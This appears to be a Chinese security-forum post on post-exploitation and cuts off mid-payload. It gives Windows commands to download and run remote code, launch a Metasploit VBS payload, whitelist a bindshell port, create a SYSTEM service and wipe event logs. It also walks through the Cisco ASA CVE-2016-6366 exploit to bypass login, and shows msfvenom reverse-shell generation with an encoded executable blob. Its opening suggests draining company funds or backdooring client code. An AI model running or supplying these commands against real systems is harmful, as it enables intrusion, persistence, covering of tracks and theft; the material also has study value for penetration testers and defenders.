用户
搜索
  • TA的每日心情
    郁闷
    2018-1-11 21:35
  • 签到天数: 91 天

    连续签到: 1 天

    [LV.6]常住居民II

    i春秋作家

    wing

    Rank: 7Rank: 7Rank: 7

    24

    主题

    132

    帖子

    931

    魔法币
    收听
    0
    粉丝
    8
    注册时间
    2016-9-29

    i春秋签约作者

    发表于 2018-1-10 11:43:44 25619

    part4 后渗透

    0x01 前言

    后渗透是渗透测试的关键组成部分。这就是您将自己与普通黑客区分开来的地方,实际上可以从渗透测试中提供有价值的信息和情报。后渗透针对特定系统,识别关键基础设施,并针对公司最重视的信息或数据,以及它试图保护的信息或数据。当你渗透一个又一个的系统时,你应该尝试着展示出那些对业务有最大影响的攻击。

    在后渗透中,进行系统攻击时,应该花时间确定各个系统的功能以及不同的用户角色。例如,假设您了解了域基础架构系统,并以企业管理员身份运行或具有域管理权限。您可能是域管,但怎么与Active Directory通信的系统呢?公司的财务应用程序如何?你能否操控这个系统,然后在下一个支付阶段中,把所有的钱从公司转到别的账户上?目标的知识产权如何?

    例如,假设您的客户是一家大型软件开发商,它将客户编码的应用程序发送给客户以供制造环境使用。你是否会在自己的源代码加上后门,实质上是让所有的客户都受到损害,那会损害他们的品牌可信度。

    后渗透是一个棘手的事情,您必须花时间了解哪些信息可供您使用,然后将这些信息哪些又有利于你。攻击者通常会花费大量的时间在被攻陷的系统上上。像恶意攻击者一样思考 - 具有创造性,快速适应,依靠自己的智慧而不是自动化工具。

    远程管理

    Command Description
    NET USE \\ip\ipc$ password /user:username 与远程服务建立一个ipc连接,如果成功,您可以尝试查看,查询....具有正确的权限.
    NET USE z: \\ip\share$ password /user:username 将远程共享映射为本地驱动器z:
    systeminfo /S ComputerName /U username /P password 此工具显示本地或远程计算机的操作系统配置信息,包括服务包级别.
    tasklist /S SERVER /U DOMAIN\username /P password 显示远程机器上当前正在运行的进程的列表.
    taskkill /S SERVER /U DOMAIN\username /P password 杀死远程服务器中的进程.
    powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))" 从远程服务器执行代码.
    powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')" 从远程服务器下载文件.
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1 本地执行test.ps1
    bitsadmin /transfer systemrepair /download /priority normal http://path/to/file c:\path\local\file 创建一个名为systemrepair的工作来从远程服务器上下载文件.
    echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs<BR><BR>cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename 用vbs下载文件
    echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs<BR><BR>cscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt 下载并执行metasploit vbs payload.
    P**ec.exe \\192.168.206.145 -accepteula -u username -p password cmd.exe /c ver 远程执行Windows命令,并返回结果
    wmic /node:SERVER /user:DOMAIN\username /password:password process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt" 在远程服务器上创建一个新进程。 没有命令结果返回.

    PROXY

    Command Description
    NETSH INTERFACE portproxy add v4tov4 listenport=LPORT connectaddress=RHOST connectport=RPORT [listenaddress=LHOST protocol=tcp] 将数据从本地端口传输到远程地址的指定端口.
    set http_proxy=http://your_proxy:your_port&lt;BR&gt;set http_proxy=http://username:password@your_proxy:your_port&lt;BR&gt;set https_proxy=https://your_proxy:your_port&lt;BR&gt;set https_proxy=https://username:password@your_proxy:your_port 在命令行下使用代理

    Whitelist-白名单

    Command Description
    NETSH FIREWALL show all 显示域/标准配置文件的允许的程序配置.
    NETSH FIREWALL add allowedprogram C:\Windows\system32\cmd.exe cmd enable 在防火墙允许的应用程序白名单中添加一个程序。
    NETSH FIREWALL delete allowedprogram cmd 从防火墙allowedprogram Whitelist删除一个项目,您也可以使用路径来删除它.
    NETSH FIREWALL show all 显示域/标准的端口配置.
    NETSH FIREWALL add portopening tcp 4444 bindshell enable all 将tcp端口4444添加到端口白名单中.

    Service

    Command Description
    sc create servicename type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start servicename 创建恶意服务,并获得本地系统特权.

    Scheduler

    Command Description
    net use \\IP\ipc$ password /user:username<BR>at \\ComputerName time "command" AT命令安排命令和程序在指定的时间和日期在计算机上运行。 net time [/domain]显示当前时间.

    Logs

    Command Description
    del %WINDIR%*.log /a /s /q /f %WINDIR%目录中删除所有*.log文件.
    wevtutil el 列出系统保存的不同日志文件.
    for /f %a in ('wevtutil el') do @wevtutil cl "%a" 清除特定日志的内容.
    powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security 清除特定的事件日志

    参考链接

    1. How to execute metasploit vbs payload in cmd.exe ?
    2. Hacking Windows Active Directory
    3. How to dump windows 2012 credentials ?
    4. How to use PowerSploit Invoke-Mimikatz to dump  credentials ?
    5. How to use vssadmin ?

    How-to-hack-Cisco-ASA-with-CVE-2016-6366

    Cisco ASA - CVE-2016-6366

    思科自适应安全设备(ASA)软件的简单网络管理协议(SNMP)代码中的漏洞可能允许经过身份验证的远程攻击者重新加载受影响的系统或远程执行代码。

    该漏洞是由于受影响的代码区域中存在缓冲区溢出。 当在虚拟或物理思科ASA设备上启用该漏洞时,该漏洞会影响所有版本的SNMP(版本1,2c和3)。 攻击者可以通过向受影响系统上的启用SNMP的接口发送精心设计的SNMP数据包来利用此漏洞。 攻击者可能允许攻击者执行任意代码并获得对系统的完全控制或导致受影响系统的重载。 攻击者必须知道SNMP字符串才能利用此漏洞。

    注意:只有指向受影响系统的流量可用于利用此漏洞。 此漏洞仅影响以路由和透明防火墙模式以及单个或多个上下文模式配置的系统。 此漏洞只能由IPv4流量触发。 攻击者需要了解SNMP版本1和SNMP版本2c中配置的SNMP公共字符串或者SNMP版本3的有效用户名和密码。
    思科发布了解决此漏洞的软件更新。 此通报的变通办法部分列出了缓解措施。

    如何登录思科ASA?

    如果您对Cisco ASA设备一无所知,请尝试使用nmap或自定义工具/方法发现有用的东西。
    如果启用snmp,我们可以尝试使用metasploit破解密码。

    msf auxiliary(snmp_login) > set PASSWORD public
    PASSWORD => public
    msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
    RHOSTS => 192.168.206.114
    msf auxiliary(snmp_login) > run
    
    [+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1) Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed

    现在,CVE-2016-6366可以帮助我们渗透远程cisco设备。

    msf auxiliary(cisco_asa_extrabacon) > show options
    
    Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       COMMUNITY  public           yes       SNMP Community String
       MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
       RETRIES    1                yes       SNMP Retries
       RHOST      192.168.206.114  yes       The target address
       RPORT      161              yes       The target port
       TIMEOUT    1                yes       SNMP Timeout
    
    msf auxiliary(cisco_asa_extrabacon) > run
     Building pass-disable payload for version 9.2(1)... Sending SNMP payload...
    [+] Clean return detected!
    [!] Don't forget to run pass-enable after logging in! Auxiliary module execution completed

    如果成功利用,请尝试用telnet登录。 攻击者可以不用密码登录到思科设备。

    $ telnet 192.168.206.114
    ciscoasa> ?
      clear       Reset functions
      enable      Turn on privileged commands
      exit        Exit from the EXEC
      help        Interactive help for commands
      login       Log in as a particular user
      logout      Exit from the EXEC
      no          Negate a command or set its defaults
      ping        Send echo messages
      quit        Exit from the EXEC
      show        Show running system information
      traceroute  Trace route to destination

    如何检查思科版本?

    ciscoasa> show version
    
    Cisco Adaptive Security Appliance Software Version 9.2(1)
    Device Manager Version 7.2(1)
    
    Compiled on Thu 24-Apr-14 12:14 PDT by builders
    System image file is "boot:/asa921-smp-k8.bin"
    Config file at boot was "startup-config"
    
    ciscoasa up 2 hours 25 mins
    
    Hardware:   ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
    Internal ATA Compact Flash, 256MB
    Slot 1: ATA Compact Flash, 8192MB
    BIOS Flash Firmware Hub @ 0x1, 0KB
    
     0: Ext: Management0/0       : address is 000c.29a9.88d6, irq 10
     1: Ext: GigabitEthernet0/0  : address is 000c.29a9.88e0, irq 5
     2: Ext: GigabitEthernet0/1  : address is 000c.29a9.88ea, irq 9
     3: Ext: GigabitEthernet0/2  : address is 000c.29a9.88f4, irq 10
    
    ASAv Platform License State: Unlicensed
    *Install -587174176 vCPU ASAv platform license for full functionality.
    The Running Activation Key is not valid, using default settings:
    
    Licensed features for this platform:
    Virtual CPUs                      : 0              perpetual
    Maximum Physical Interfaces       : 10             perpetual
    Maximum VLANs                     : 50             perpetual
    Inside Hosts                      : Unlimited      perpetual
    Failover                          : Active/Standby perpetual
    Encryption-DES                    : Enabled        perpetual
    Encryption-3DES-AES               : Enabled        perpetual
    Security Contexts                 : 0              perpetual
    GTP/GPRS                          : Disabled       perpetual
    AnyConnect Premium Peers          : 2              perpetual
    AnyConnect Essentials             : Disabled       perpetual
    Other VPN Peers                   : 250            perpetual
    Total VPN Peers                   : 250            perpetual
    Shared License                    : Disabled       perpetual
    AnyConnect for Mobile             : Disabled       perpetual
    AnyConnect for Cisco VPN Phone    : Disabled       perpetual
    Advanced Endpoint Assessment      : Disabled       perpetual
    UC Phone Proxy Sessions           : 2              perpetual
    Total UC Proxy Sessions           : 2              perpetual
    Botnet Traffic Filter             : Enabled        perpetual
    Intercompany Media Engine         : Disabled       perpetual
    Cluster                           : Disabled       perpetual
    
    This platform has an ASAv VPN Premium license.
    
    Serial Number: 9ATJDXTHK3B
    Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
    
    Image type          : Release
    Key version         : A
    
    Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016

    如何进入特权模式?

    enable可以用来进入思科配置模式。 通常,密码为空。

    ciscoasa> help enable
    
    USAGE:
    
        enable [<priv_level>]
    
    DESCRIPTION:
    
    enable      Turn on privileged commands
    
    ciscoasa> enable ?
    
      <0-15>  Enter optional privilege level (0-15)
      <cr>
    
      ciscoasa> enable
      Password:
      ciscoasa# configure terminal
      ciscoasa(config)# ?
    
        aaa                           Enable, disable, or view user authentication,
                                      authorization and accounting
        aaa-server                    Configure a AAA server group or a AAA server
        access-group                  Bind an access-list to an interface to filter
                                      traffic
        access-list                   Configure an access control element
        arp                           Change or view ARP table, set ARP timeout
                                      value, view statistics
        as-path                       BGP autonomous system path filter
        asdm                          Configure Device Manager
        asp                           Configure ASP parameters
        auth-prompt                   Customize authentication challenge, reject or
                                      acceptance prompt
        auto-update                   Configure Auto Update
        banner                        Configure login/session banners
        bgp-community                 format for BGP community
        boot                          Set system boot parameters
        ca                            Certification authority
        call-home                     Smart Call-Home Configuration
        checkheaps                    Configure checkheap verification intervals
        class-map                     Configure MPF Class Map
        clear                         Clear
        client-update                 Configure and change client update parameters
        clock                         Configure time-of-day clock
        cluster                       Cluster configuration
        command-alias                 Create command alias
        community-list                Add a community list entry
        compression                   Configure global Compression parameters
        configure                     Configure using various methods
        console                       Serial console functions
        coredump                      Configure Coredump options
        crashinfo                     Enable/Disable writing crashinfo to flash
        crypto                        Configure IPSec, ISAKMP, Certification
                                      authority, key
        ctl-file                      Configure a ctl-file instance
        ctl-provider                  Configure a CTL Provider instance
        cts                           Cisco Trusted Security commands
        ddns                          Configure dynamic DNS update method
        dhcp-client                   Configure parameters for DHCP client operation
        dhcpd                         Configure DHCP Server
        dhcprelay                     Configure DHCP Relay Agent
        dns                           Add DNS functionality to an interface
        dns-group                     Set the global DNS server group
        dns-guard                     Enforce one DNS response per query
        domain-name                   Change domain name
        dynamic-access-policy-record  Dynamic Access Policy configuration commands
        dynamic-filter                Configure Dynamic Filter
        dynamic-map                   Configure crypto dynamic map
        enable                        Configure password for the enable command
        end                           Exit from configure mode
        established                   Allow inbound connections based on established
                                      connections
        event                         Configure event manager
        exit                          Exit from config mode
        failover                      Enable/disable failover feature
        filter                        Enable or disable URL, FTP, HTTPS, Java, and
                                      ActiveX filtering
        fips                          FIPS 140-2 compliance information
        firewall                      Switch to router/transparent mode
        fixup                         Add or delete inspection services
        flow-export                   Configure flow information export through
                                      NetFlow
        fragment                      Configure the IP fragment database
        ftp                           Set FTP mode
        ftp-map                       Configure advanced options for FTP inspection
        group-delimiter               The delimiter for tunnel-group lookup.
        group-policy                  Configure or remove a group policy
        gtp-map                       Configure advanced options for GTP inspection
        h225-map                      Configure advanced options for H225 inspection
        help                          Interactive help for commands
        hostname                      Change host name of the system
        hpm                           Configure TopN host statistics collection
        http                          Configure http server and https related
                                      commands
        http-map                      This command has been deprecated.
        icmp                          Configure access rules for ICMP traffic
        imap4s                        Configure the imap4s service
        interface                     Select an interface to configure
        ip                            Configure IP address pools
        ip                            Configure IP addresses, address pools, IDS, etc
        ipsec                         Configure transform-set, IPSec SA lifetime and
                                      PMTU Aging reset timer
        ipv6                          Configure IPv6 address pools
        ipv6                          Global IPv6 configuration commands
        ipv6-vpn-addr-assign          Global settings for VPN IP address assignment
                                      policy
        isakmp                        Configure ISAKMP options
        jumbo-frame                   Configure jumbo-frame support
        key                           Create various configuration keys
        l2tp                          Configure Global L2TP Parameters
        ldap                          Configure LDAP Mapping
        logging                       Configure logging levels, recipients and other
                                      options
        logout                        Logoff from config mode
        mac-address                   MAC address options
        mac-list                      Create a mac-list to filter based on MAC
                                      address
        management-access             Configure management access interface
        map                           Configure crypto map
        media-termination             Configure a media-termination instance
        mgcp-map                      Configure advanced options for MGCP inspection
        migrate                       Migrate IKEv1 configuration to IKEv2/SSL
        monitor-interface             Enable or disable failover monitoring on a
                                      specific interface
        mount                         Configure a system mount
        mroute                        Configure static multicast routes
        mtu                           Specify MTU(Maximum Transmission Unit) for an
                                      interface
        multicast-routing             Enable IP multicast
        name                          Associate a name with an IP address
        names                         Enable/Disable IP address to name mapping
        nat                           Associate a network with a pool of global IP
                                      addresses
        no                            Negate a command or set its defaults
        ntp                           Configure NTP
        nve                           Configure an Network Virtulization Endpoint
                                      (NVE)
        object                        Configure an object
        object-group                  Create an object group for use in
                                      'access-list', etc
        object-group-search           Enables object group search algorithm
        pager                         Control page length for pagination
        passwd                        Change Telnet console access password
        password                      Configure password encryption
        password-policy               Configure password policy options
        phone-proxy                   Configure a Phone proxy instance
        pim                           Configure Protocol Independent Multicast
        policy-list                   Define IP Policy list
        policy-map                    Configure MPF Parameter Map
        pop3s                         Configure the pop3s service
        prefix-list                   Build a prefix list
        priority-queue                Enter sub-command mode to set priority-queue
                                      attributes
        privilege                     Configure privilege levels for commands
        prompt                        Configure session prompt display
        quit                          Exit from config mode
        quota                         Configure quotas
        regex                         Define a regular expression
        remote-access                 Configure SNMP trap threshold for VPN
                                      remote-access sessions
        route                         Configure a static route for an interface
        route-map                     Create route-map or enter route-map
                                      configuration mode
        router                        Enable a routing process
        same-security-traffic         Enable same security level interfaces to
                                      communicate
        scansafe                      Scansafe configuration
        service                       Configure system services
        service-interface             service-interface for dynamic interface types
        service-policy                Configure MPF service policy
        setup                         Pre-configure the system
        sla                           IP Service Level Agreement
        smtp-server                   Configure default SMTP server address to be
                                      used for Email
        smtps                         Configure the smtps service
        snmp                          Configure the SNMP options
        snmp-map                      Configure an snmp-map, to control the operation
                                      of the SNMP inspection
        snmp-server                   Modify SNMP engine parameters
        ssh                           Configure SSH options
        ssl                           Configure SSL options
        sunrpc-server                 Create SUNRPC services table
        sysopt                        Set system functional options
        tcp-map                       Configure advanced options for TCP inspection
        telnet                        Add telnet access to system console or set idle
                                      timeout
        terminal                      Set terminal line parameters
        tftp-server                   Configure default TFTP server address and
                                      directory
        threat-detection              Show threat detection information
        time-range                    Define time range entries
        timeout                       Configure maximum idle times
        tls-proxy                     Configure a TLS proxy instance or the maximum
                                      sessions
        track                         Object tracking configuration commands
        tunnel-group                  Create and manage the database of connection
                                      specific records for IPSec connections
        tunnel-group-map              Specify policy by which the tunnel-group name
                                      is derived from the content of a certificate.
        uc-ime                        Configure a Cisco Intercompany Media Engine
                                      (UC-IME) instance
        url-block                     Enable URL pending block buffer and long URL
                                      support
        url-cache                     Enable/Disable URL caching
        url-server                    Configure a URL filtering server
        user-identity                 Configure user-identity firewall
        username                      Configure user authentication local database
        virtual                       Configure address for authentication virtual
                                      servers
        vnmc                          Configure VNMC params
        vpdn                          Configure VPDN feature
        vpn                           Configure VPN parameters.
        vpn-addr-assign               Global settings for VPN IP address assignment
                                      policy
        vpn-sessiondb                 Configure the VPN Session Manager
        vpnsetup                      Configure VPN Setup Commands
        vxlan                         Configure VXLAN system parameters
        wccp                          Web-Cache Coordination Protocol Commands
        webvpn                        Configure the WebVPN service
        xlate                         Configure an xlate option
        zonelabs-integrity            ZoneLabs integrity Firewall Server
                                      Configuration
    

    如何配置cisco接口?

      ciscoasa(config)# interface ?
    
    configure mode commands/options:
      GigabitEthernet  GigabitEthernet IEEE 802.3z
      Management       Management interface
      Redundant        Redundant Interface
      TVI              Tenant Virtual Interface
      vni              VNI Interface
      <cr>
    
    ciscoasa(config)# interface GigabitEthernet ?
    
    configure mode commands/options:
      <0-0>  GigabitEthernet interface number
    
    ciscoasa(config)# interface GigabitEthernet 0/?
    
    configure mode commands/options:
      <0-2>  GigabitEthernet interface number
    
    ciscoasa(config)# interface GigabitEthernet 0/0

    如何设置IP地址?

    ciscoasa(config-if)# ?
    
    Interface configuration commands:
      authentication   authentication subcommands
      ddns             Configure dynamic DNS
      default          Set a command to its defaults
      delay            Specify interface throughput delay
      description      Interface specific description
      dhcp             Configure parameters for DHCP client
      dhcprelay        Configure DHCP Relay Agent
      duplex           Configure duplex operation
      exit             Exit from interface configuration mode
      flowcontrol      Configure flowcontrol operation
      hello-interval   Configures EIGRP-IPv4 hello interval
      help             Interactive help for interface subcommands
      hold-time        Configures EIGRP-IPv4 hold time
      igmp             IGMP interface commands
      ip               Configure the ip address
      ipv6             IPv6 interface subcommands
      mac-address      Assign MAC address to interface
      management-only  Dedicate an interface to management. Block thru traffic
      mfib             Interface Specific MFIB Control
      multicast        Configure multicast routing
      nameif           Assign name to interface
      no               Negate a command or set its defaults
      ospf             OSPF interface commands
      pim              PIM interface commands
      pppoe            Configure parameters for PPPoE client
      rip              Router Information Protocol
      security-level   Specify the security level of this interface after this
                       keyword, Eg: 0, 100 etc. The relative security level between
                       two interfaces determines the way the Adaptive Security
                       Algorithm is applied. A lower security_level interface is
                       outside relative to a higher level interface and equivalent
                       interfaces are outside to each other
      shutdown         Shutdown the selected interface
      speed            Configure speed operation
      split-horizon    Configures EIGRP-IPv4 split-horizon
      summary-address  Configures EIGRP-IPv4 summary-address
    ciscoasa(config-if)# ip address ?
    
    interface mode commands/options:
      Hostname or A.B.C.D  Firewall's network interface address
      dhcp                 Keyword to use DHCP to poll for information. Enables the
                           DHCP client feature on the specified interface
      pppoe                Keyword to use PPPoE to poll for information. Enables
                           the PPPoE client feature on the specified interface
    ciscoasa(config)#  ip address 192.168.206.114 255.255.255.0
    ciscoasa(config-if)# no shutdown
    ciscoasa(config-if)# exit
    ciscoasa(config)# exit
    ciscoasa# ping 192.168.206.1
    Type escape sequence to abort.
    Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
    !!!!!
    Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

    如何启用snmp服务?

    ciscoasa# configure terminal
    ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public

    如何启用启用SSH服务?

    ciscoasa# configure terminal
    ciscoasa(config)# username admin password password
    ciscoasa(config)# aaa authentication ssh console LOCAL
    ciscoasa(config)# passwd password
    ciscoasa(config)# crypto key generate rsa ?            
    
    configure mode commands/options:
      general-keys  Generate a general purpose RSA key pair for signing and
                    encryption
      label         Provide a label
      modulus       Provide number of modulus bits on the command line
      noconfirm     Specify this keyword to suppress all interactive prompting.
      usage-keys    Generate seperate RSA key pairs for signing and encryption
      <cr>
    ciscoasa(config)# crypto key generate rsa modulus ?
    
    configure mode commands/options:
      1024  1024 bits
      2048  2048 bits
      4096  4096 bits
      512   512 bits
      768   768 bits
    
    ciscoasa(config)#  ssh 192.168.206.1 255.255.255.0 inside
    ciscoasa(config)#  ssh 192.168.206.137 255.255.255.0 inside
    ciscoasa(config)#  ssh version 2

    如何启用Telnet服务?

    ciscoasa# configure terminal
    ciscoasa(config)# aaa authentication telnet console LOCAL
    ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside

    链接

    1. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
    2. http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-3. firewalls/118075-configure-asa-00.html
    3. https://github.com/RiskSense-Ops/CVE-2016-6366/
    4. http://paper.seebug.org/31/

    Windows_ActiveDirectory

    在cmd shell中执行metasploit vbs payload

    如果你是一个pentester/安全研究员,你可能希望从cmd shell获得meterpreter会话,例如:sqlmap --os-shell或其他工具。例如:

    $ ncat -l -p 4444
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.  
    
    C:\Documents and Settings\test\Desktop>ver
    ver  
    
    Microsoft Windows XP [Version 5.1.2600]
    C:\Documents and Settings\test\Desktop>

    在以前,你可能会尝试下面的方法:

    • 将exe转换成批处理脚本。
    • 从远程服务器下载payload文件(ftp,tftp,http,....)
    • ......

    现在,我将向您展示如何在cmd.exe中运行metasploit  payload。 请尝试考虑以下问题:

    • 如何用msfVENOM生成一个payload?
    • 如何以简单/兼容的方式运行payload?

    如何用msfvenom生成一个payload?

    $ msfvenom -p windows/meterpreter/reverse_tcp
     LHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform win
    
     No encoder or badchars specified, outputting raw payload
     Payload size: 333 bytes
     Final size of vbs file: 7370 bytes
     Function oSpLpsWeU(XwXDDtdR)
      urGQiYVn = "" & _           
      XwXDDtdR & ""      
      Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
      gFMdOBBiLZ.LoadXML(urGQiYVn)
      oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
      set gFMdOBBiLZ = nothing
     End Function
    
     Function skbfzWOqR()
      cTENSbYbnWY = "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